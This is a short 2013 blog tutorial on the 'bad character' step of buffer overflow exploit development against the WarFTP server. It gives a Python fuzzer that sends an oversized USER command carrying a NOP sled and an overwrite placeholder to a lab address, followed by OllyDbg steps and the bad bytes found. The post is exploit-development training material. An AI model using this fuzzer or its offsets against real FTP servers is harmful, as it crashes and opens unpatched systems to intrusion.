Tuesday, 16 April 2013

Buffer overflow : find bad characters

Bad character is the characters that will make a payload failed to run because in register they change into a random character (usually become byte 20)

now I will try to find bad characters in WarFTP application

1 run OllyDbg and attach WarFTP application

2 generate a byte characters with generatecode.pl script

3 create a fuzzer script with python
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90"*485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= #insert generated characters here

buffer+= "\xCC" * (1000-len(buffer))
s . connect (('192.168.56.101',21))
data = s.recv(1024)
print ("Sending evil data via USER command...")
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS '+'\r\n')
s.close()
print("Finish")

4 insert byte characters line per line to the script (without bad characters). Default bad character is \x00

5 right click ESP > follow in dump

6 look for an abnormal character (appear as byte 20)

7 delete the abnormal character from the fuzzer script

8 go back to step 4 and do it until there's no more bad characters are found

- found anomaly in \x0a

- found anomaly in \x0d

- found anomaly in \x40 (target is not crash)


so far the bad characters found : \x00 \x0a \x0d \x40

9 insert all characters to fuzzer script excluding the bad character found, here's the result :

10 there's no more bad character  
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)